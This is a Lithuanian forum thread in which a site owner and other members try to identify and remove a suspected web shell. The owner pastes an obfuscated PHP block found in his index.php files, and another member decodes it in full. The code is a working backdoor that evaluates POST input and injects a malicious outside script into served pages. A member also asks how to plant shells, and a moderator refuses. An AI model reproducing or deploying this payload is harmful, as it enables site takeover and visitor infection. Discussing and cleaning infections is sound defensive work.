Pradinis
Pagalba
Užsisakyk!
- Reklamą
- Hostingą
- El. pašto dėžutę
Užsisakyk!
Įrankiai
Pasidalink
- Visos temos
Forumas | PHP-Fusion, WordPress, Shopify, PHP ir MySQL (PROGRAMAVIMAS) | Expert PHP, MySQL klausimai |
Puslapis 1 iš 2 | 1 | 2 |
Autorius: blist | Peržiūrų: 12864 |
blist Narys Ekspertas Pranešimai: 2896 Įstojęs: 2008 Vas. 24 14:02:54 | |
Sveiki, Wiav sako, kad mano saite yra shell`as, bet iškur ir kaip jis galėjo ten atsirasti, jei nėra net forumas sukurtas per kurį galėtų prisegt tą failą, niekas nežino mano ftp slaptažodžio, svetainės taip pat. Man bent jau nemeta nieko, kad yra koks shell`as ir t.t.. Parsisiųntus visus ftp failus ir juos praskanavus su AVG Free taip pat nieko nebuvo rasta - 0 infections. Tai kame replės? Galit man padėti ir pažiūrėt http://mp3club.lt ar meta jums ką nors jūsų anti-virusinės. Dėkoju. |
|
FanatiC Narys Ekspertas Pranešimai: 3296 Įstojęs: 2008 Gru. 11 20:12:05 | |
Man aplamai kai į tavo webą ateini išmeta dont sent |
|
blist Narys Ekspertas Pranešimai: 2896 Įstojęs: 2008 Vas. 24 14:02:54 | |
Ir man tas pats buvo su Opera, tik iš kelinto karto normaliai įleido. Su Google Chrome normaliai atidaro. Gali čia prie to būt prisikišęs tas shell`as? |
|
FanatiC Narys Ekspertas Pranešimai: 3296 Įstojęs: 2008 Gru. 11 20:12:05 | |
Čia mano manymu ne shellas kažkas kito,man necypia AVG,bet shellą gali prisegti bet kurioje vietoje patyres tos srities specialistas,kaip followui prikabino prie news.php?read... |
|
blist Narys Ekspertas Pranešimai: 2896 Įstojęs: 2008 Vas. 24 14:02:54 | |
tai kaip sužinot ar yra kasnors? nes mano antivirusinė nieko nereaguoja ir praskanavus ftp failus nieko nerado.. tai ką daryt?.. |
|
sigitas123 Narys Pulkininkas Pranešimai: 426 Įstojęs: 2009 Lie. 6 23:07:35 | |
man pakrauną be virusu normaliai |
|
blist Narys Ekspertas Pranešimai: 2896 Įstojęs: 2008 Vas. 24 14:02:54 | |
jei ne opera naudoji tai ir pakrauna, o jei naudoji opera tai tik iš kelių sykių.. |
|
d0mce Narys Buldozeris Pranešimai: 202 Įstojęs: 2009 Lap. 23 15:11:01 | |
jei būtu shell'as tai netik Virusas butu, bet ir tas žmogus kuris įsttė shell'a valdytu tavo FTP. http://mightmedia.lt Lietuvių sukurtas TVS. |
|
blist Narys Ekspertas Pranešimai: 2896 Įstojęs: 2008 Vas. 24 14:02:54 | |
tą tai žinau, bet Wiav`ui kaspersky rodė, kad yra shell`as. Todėl jūsų klausiu kaip įsitikinti ar tai tiesa ir jį panaikinti.. |
|
Pakartoti slaptažodį Moderatorius Viršesnis už Dievą Pranešimai: 5188 Įstojęs: 2008 Rugp. 6 22:08:39 | |
Lėtai krauna web. Užlūžta.. Peržiūrėk visus failus ir jų turinius, gal kaiką įtartino pastebėsi? |
|
blist Narys Ekspertas Pranešimai: 2896 Įstojęs: 2008 Vas. 24 14:02:54 | |
net neįsivaizduoju kaip galėtų atrodyt tas kažkas įtartino.. ir nejaugi dabar visus failus peržiūrinėt? kaip gali atrodyt tas shell`as? |
|
Pakartoti slaptažodį Moderatorius Viršesnis už Dievą Pranešimai: 5188 Įstojęs: 2008 Rugp. 6 22:08:39 | |
Labai daug įvairių funkcijų, na atrodo baugiai. |
|
d0mce Narys Buldozeris Pranešimai: 202 Įstojęs: 2009 Lap. 23 15:11:01 | |
pagal viską galėjo per adminke ystatyti shell'ą yra daug variantu daviai kam administratoriaus laipsnį jis įkišo arba jo pass sužinojo ir per pridėtinius įmetė shell'a antras vairiantas su exploitu, tavo hashą sužinojo administratoriaus ir įkišo per pridėtinius. http://mightmedia.lt Lietuvių sukurtas TVS. |
|
blist Narys Ekspertas Pranešimai: 2896 Įstojęs: 2008 Vas. 24 14:02:54 | |
kokiuose failuose dažniausiai jie apsireiškia? tame ir yra reikalas, kad nėra kitų admin`ų, tik aš vienas. + yra apsauga, kad tik mano IP galėtų įeiti į adminkę, o jei eina su kitu IP logina to vartotojo ip kurį aš galiu peržiūrėti. Redagavo blist 2009 Lap. 26 22:11:57 |
|
d0mce Narys Buldozeris Pranešimai: 202 Įstojęs: 2009 Lap. 23 15:11:01 | |
pavarai tą apsaugą su tavo ipu jau beviltiška nežinau kaip. Tą apsauga galima apeiti per pora minučių. http://mightmedia.lt Lietuvių sukurtas TVS. |
|
nbanba Narys Kapitonas Pranešimai: 727 Įstojęs: 2007 Bir. 18 22:06:19 | |
Prie ko čia saitą lėtai krauna ir pan... Shellas yra atskirame faile (dažniausiai .php). Yra skriptas nuo shelų praskanuoti, parašyk man į skype - duosiu. |
|
d0mce Narys Buldozeris Pranešimai: 202 Įstojęs: 2009 Lap. 23 15:11:01 | |
tokia ten tavo ir apsauga Yra free visur išdalinta. Be to jinai tik randą shell'ą bet neištryna http://mightmedia.lt Lietuvių sukurtas TVS. |
|
blist Narys Ekspertas Pranešimai: 2896 Įstojęs: 2008 Vas. 24 14:02:54 | |
va radau index.php faile štai ką:<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnemJwcCcpKXtmdW5jdGlvbiB6YnBwKCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKGNvdW50KGV4cGxvZGUoIlxuIiwkdikpPjUpeyRlPXByZWdfbWF0Y2goJyNbXCciXVteXHNcJyJcLiw7XD8hXFtcXTovPD5cKFwpXXszMCx9IycsJHYpfHxwcmVnX21hdGNoKCcjW1woXFtdKFxzKlxkKywpezIwLH0jJywkdik7aWYoKHByZWdfbWF0Y2goJyNcYmV2YWxcYiMnLCR2KSYmKCRlfHxzdHJwb3MoJHYsJ2Zyb21DaGFyQ29kZScpKSl8fCgkZSYmc3RycG9zKCR2LCdkb2N1bWVudC53cml0ZScpKSkkcz1zdHJfcmVwbGFjZSgkdiwnJywkcyk7fWlmKHByZWdfbWF0Y2hfYWxsKCcjPGlmcmFtZSAoW14+XSo/KXNyYz1bXCciXT8oaHR0cDopPy8vKFtePl0qPyk+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXWFzJHYpaWYocHJlZ19tYXRjaCgnI1tcLiBdd2lkdGhccyo9XHMqW1wnIl0/MCpbMC05XVtcJyI+IF18ZGlzcGxheVxzKjpccypub25lI2knLCR2KSYmIXN0cnN0cigkdiwnPycuJz4nKSkkcz1wcmVnX3JlcGxhY2UoJyMnLnByZWdfcXVvdGUoJHYsJyMnKS4nLio/PC9pZnJhbWU+I2lzJywnJywkcyk7JHM9c3RyX3JlcGxhY2UoJGE9YmFzZTY0X2RlY29kZSgnUEhOamNtbHdkQ0J6Y21NOWFIUjBjRG92TDIxdmMzcHJkbUYwWlhJdVpYaDBjbUV1YUhVdlpURXdOMTl3YkhWbmFXNXpMMUJwZUdWc1FuVjBkRzl1TG5Cb2NDQStQQzl6WTNKcGNIUSsnKSwnJywkcyk7aWYoc3RyaXN0cigkcywnPGJvZHknKSkkcz1wcmVnX3JlcGxhY2UoJyMoXHMqPGJvZHkpI21pJywkYS4nXDEnLCRzLDEpO2Vsc2VpZihzdHJwb3MoJHMsJzxhJykpJHM9JGEuJHM7cmV0dXJuJHM7fWZ1bmN0aW9uIHpicHAyKCRhLCRiLCRjLCRkKXtnbG9iYWwkemJwcDE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJHpicHAxKSljYWxsX3VzZXJfZnVuYygkemJwcDEsJGEsJGIsJGMsJGQpO2ZvcmVhY2goQG9iX2dldF9zdGF0dXMoMSlhcyR2KWlmKCgkYT0kdlsnbmFtZSddKT09J3picHAnKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2Ukc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCd6YnBwJyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JHpicHBsPSgoJGE9QHNldF9lcnJvcl9oYW5kbGVyKCd6YnBwMicpKSE9J3picHAyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs=')); ?><?php kas tai? |
|
d0mce Narys Buldozeris Pranešimai: 202 Įstojęs: 2009 Lap. 23 15:11:01 | |
čia yra virusas man rdos tie cheroglifai, mėgink pašalint bet keistas virusas pradžia turėtu buti <iframe o bėja jis pačiam viršui ar apačioje index.php faile? http://mightmedia.lt Lietuvių sukurtas TVS. |
|
blist Narys Ekspertas Pranešimai: 2896 Įstojęs: 2008 Vas. 24 14:02:54 | |
pačiame viršuje. |
|
FanatiC Narys Ekspertas Pranešimai: 3296 Įstojęs: 2008 Gru. 11 20:12:05 | |
Čia ir yra shellas,pažiūrėk kodą iššifruok... Jis būna bet kur kur jį ikiš pažiek dar includes faile |
|
d0mce Narys Buldozeris Pranešimai: 202 Įstojęs: 2009 Lap. 23 15:11:01 | |
gali būti, kad jis ir užkretė adminkei index.php patikrink dar ten . Taip čia shell'as bent jau toks mano http://mightmedia.lt Lietuvių sukurtas TVS. |
|
Naktibalda Narys Buldozeris Pranešimai: 249 Įstojęs: 2009 Rugs. 1 19:09:40 | |
<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnemJwcCcpKXtmdW5jdGlvbiB6YnBwKCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKGNvdW50KGV4cGxvZGUoIlxuIiwkdikpPjUpeyRlPXByZWdfbWF0Y2goJyNbXCciXVteXHNcJyJcLiw7XD8hXFtcXTovPD5cKFwpXXszMCx9IycsJHYpfHxwcmVnX21hdGNoKCcjW1woXFtdKFxzKlxkKywpezIwLH0jJywkdik7aWYoKHByZWdfbWF0Y2goJyNcYmV2YWxcYiMnLCR2KSYmKCRlfHxzdHJwb3MoJHYsJ2Zyb21DaGFyQ29kZScpKSl8fCgkZSYmc3RycG9zKCR2LCdkb2N1bWVudC53cml0ZScpKSkkcz1zdHJfcmVwbGFjZSgkdiwnJywkcyk7fWlmKHByZWdfbWF0Y2hfYWxsKCcjPGlmcmFtZSAoW14+XSo/KXNyYz1bXCciXT8oaHR0cDopPy8vKFtePl0qPyk+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXWFzJHYpaWYocHJlZ19tYXRjaCgnI1tcLiBdd2lkdGhccyo9XHMqW1wnIl0/MCpbMC05XVtcJyI+IF18ZGlzcGxheVxzKjpccypub25lI2knLCR2KSYmIXN0cnN0cigkdiwnPycuJz4nKSkkcz1wcmVnX3JlcGxhY2UoJyMnLnByZWdfcXVvdGUoJHYsJyMnKS4nLio/PC9pZnJhbWU+I2lzJywnJywkcyk7JHM9c3RyX3JlcGxhY2UoJGE9YmFzZTY0X2RlY29kZSgnUEhOamNtbHdkQ0J6Y21NOWFIUjBjRG92TDIxdmMzcHJkbUYwWlhJdVpYaDBjbUV1YUhVdlpURXdOMTl3YkhWbmFXNXpMMUJwZUdWc1FuVjBkRzl1TG5Cb2NDQStQQzl6WTNKcGNIUSsnKSwnJywkcyk7aWYoc3RyaXN0cigkcywnPGJvZHknKSkkcz1wcmVnX3JlcGxhY2UoJyMoXHMqPGJvZHkpI21pJywkYS4nXDEnLCRzLDEpO2Vsc2VpZihzdHJwb3MoJHMsJzxhJykpJHM9JGEuJHM7cmV0dXJuJHM7fWZ1bmN0aW9uIHpicHAyKCRhLCRiLCRjLCRkKXtnbG9iYWwkemJwcDE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJHpicHAxKSljYWxsX3VzZXJfZnVuYygkemJwcDEsJGEsJGIsJGMsJGQpO2ZvcmVhY2goQG9iX2dldF9zdGF0dXMoMSlhcyR2KWlmKCgkYT0kdlsnbmFtZSddKT09J3picHAnKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2Ukc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCd6YnBwJyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JHpicHBsPSgoJGE9QHNldF9lcnJvcl9oYW5kbGVyKCd6YnBwMicpKSE9J3picHAyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs=')); ?><?php va kas užkoduotas čia base64 kodavimu: if(!function_exists('zbpp')){function zbpp($s){if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0]as$v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0]as$v)if(preg_match('#[\. ]width\s*=\s*[\'"]?0*[0-9][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL21vc3prdmF0ZXIuZXh0cmEuaHUvZTEwN19wbHVnaW5zL1BpeGVsQnV0dG9uLnBocCA+PC9zY3JpcHQ+'),'',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s,1);elseif(strpos($s,'<a'))$s=$a.$s;return$s;}function zbpp2($a,$b,$c,$d){global$zbpp1;$s=array();if(function_exists($zbpp1))call_user_func($zbpp1,$a,$b,$c,$d);foreach(@ob_get_status(1)as$v)if(($a=$v['name'])=='zbpp')return;elseif($a=='ob_gzhandler')break;else$s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('zbpp');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}$zbppl=(($a=@set_error_handler('zbpp2'))!='zbpp2')?$a:0;eval(base64_decode($_POST['e'])); dar jame yra vienas base64 kodas: <script src=http://moszkvater.extra.hu/e107_plugins/PixelButton.php ></script> |
|
blist Narys Ekspertas Pranešimai: 2896 Įstojęs: 2008 Vas. 24 14:02:54 | |
tai kiek suprantu iframe užkoduotas? |
|
d0mce Narys Buldozeris Pranešimai: 202 Įstojęs: 2009 Lap. 23 15:11:01 | |
dar turiu klausimą tai gal kas moką įstatyti shell'ą į webą? KAs pasakytu kaip per pridėtinius bučiau dėkingas. Iframe negali būti užkoduotas, čia jau visą ta cheroglifu eilutė shell'as. http://mightmedia.lt Lietuvių sukurtas TVS. |
|
blist Narys Ekspertas Pranešimai: 2896 Įstojęs: 2008 Vas. 24 14:02:54 | |
bet ta eilutė yra visuose index.php failuose.. |
|
Naktibalda Narys Buldozeris Pranešimai: 249 Įstojęs: 2009 Rugs. 1 19:09:40 | |
tai trint mėgink |
|
d0mce Narys Buldozeris Pranešimai: 202 Įstojęs: 2009 Lap. 23 15:11:01 | |
tai gi sakiau, reiškia jisai per pridėtinius tau shell'ą įmetė. Tvarkykis dabar <iframe neužkoduotas, kaltas kodas. trink keisk toliau neišmanau, kaip jį naikint Be to nueik per pridėtinius pažiurėk ar nėra sukurto to ko tau nereikia. http://mightmedia.lt Lietuvių sukurtas TVS. |
|
FanatiC Narys Ekspertas Pranešimai: 3296 Įstojęs: 2008 Gru. 11 20:12:05 | |
Ai žn čia čia visgi iframe pas mane irgi taip buvo,ištrinu iš visur vistiek kitą dieną vėl būna,persidėk išnaujo visus failus ir išvalyk juos. |
|
d0mce Narys Buldozeris Pranešimai: 202 Įstojęs: 2009 Lap. 23 15:11:01 | |
fanatic jei būna tai reiškia reikia Kariauti su <iframe pas mane irgi buvo 2sav kariavau ir įvėkiau, nereikia čia jokį perinstlaiavimu http://mightmedia.lt Lietuvių sukurtas TVS. |
|
blist Narys Ekspertas Pranešimai: 2896 Įstojęs: 2008 Vas. 24 14:02:54 | |
išduok paslaptį kaip įveikiai |
|
d0mce Narys Buldozeris Pranešimai: 202 Įstojęs: 2009 Lap. 23 15:11:01 | |
kas diena triniau ta kodą viruso. Triniau triniau, kokias 2sav, ir jau pastebėjau, kad nebeatsirandinėjo virusas. Be to jau nebeturiu, bet man GOOGLE administracija buvo parašė news.php kodą, kad virusas numetu kitur ir nerašytu, kad svetainė kenkėjiška. Šiaip turėtum ir tų į emailą gauti, bet ne dabar kai dar nerodo, kad yra virusiukas svetainėje. http://mightmedia.lt Lietuvių sukurtas TVS. |
|
Naktibalda Narys Buldozeris Pranešimai: 249 Įstojęs: 2009 Rugs. 1 19:09:40 | |
eik per failus ir trink tą eilutę ir jeigu tai vis dėlto iframe praskanuok pc su šituo nes pagrinde viskas per pc |
|
d0mce Narys Buldozeris Pranešimai: 202 Įstojęs: 2009 Lap. 23 15:11:01 | |
tai klausiu niekas negali pasidalinti kaip per pridėtinius puslapius shell'ą įstatyti į webą? http://mightmedia.lt Lietuvių sukurtas TVS. |
|
Pakartoti slaptažodį Moderatorius Viršesnis už Dievą Pranešimai: 5188 Įstojęs: 2008 Rugp. 6 22:08:39 | |
Paprastas upload skriptas. |
|
Narys Tankas Pranešimai: 2100 Įstojęs: 2006 Rugp. 17 16:08:42 | |
d0mce parašė: tai klausiu niekas negali pasidalinti kaip per pridėtinius puslapius shell'ą įstatyti į webą? Bano nori? Skaitom taisyklės. JOKIU KLAUSIMŲ APIE HACKINIMUS. Kas dėl shello - Įdėti galėjo per panelės/pridėtiniu puslapius. O jeigu pas jūsų yra iframe virusas (užnesa kartais ir į shellą) - tai patys kalti (jokie chmodai nepadės čia tik išmislas). Kaltas jūsų PC ir AVG free laisvai apsaugo nuo to. Redagavo Kelmas 2009 Lap. 27 09:11:52 |
|
Wiav Narys Tankas Pranešimai: 2116 Įstojęs: 2008 Vas. 10 16:02:29 | |
Dabar jau meta trojaną, į savo kompą įsidėk symatech anti-virus ir praskenuok. shell atrodo .php failo pavidalu. Arba kokiam faile sudėtingas ilgas kodas. Atpažinti įmanomą. Redagavo Wiav 2009 Lap. 27 09:11:14 |
|
d0mce Narys Buldozeris Pranešimai: 202 Įstojęs: 2009 Lap. 23 15:11:01 | |
pamiršęs taisykles buvau O MediaL taigi davė kodą kur yra shellas jis galvoja, ar tai užko0duota, ar ištrini eilute ir laimingas kitur bėgi http://mightmedia.lt Lietuvių sukurtas TVS. |
|
Bentley Narys Spalvotas Pranešimai: 41 Įstojęs: 2007 Spa. 6 09:10:57 | |
pas mane kav iskart suveikia kai tik uzeinu i tavo saita Exploit.Win32.Pidief.crv http://moszkvater.extra.hu/e107_plugins/PixelButton.php?s=CTBN48tA&id=2 |
|
blist Narys Ekspertas Pranešimai: 2896 Įstojęs: 2008 Vas. 24 14:02:54 | |
Wiav parašė: Dabar jau meta trojaną, į savo kompą įsidėk symatech anti-virus ir praskenuok. shell atrodo .php failo pavidalu. Arba kokiam faile sudėtingas ilgas kodas. Atpažinti įmanomą. O mano AVG nesusipjaus su tuo symatech anti-virus? |
Puslapis 1 iš 2 | 1 | 2 |
Peršokti į forumą: |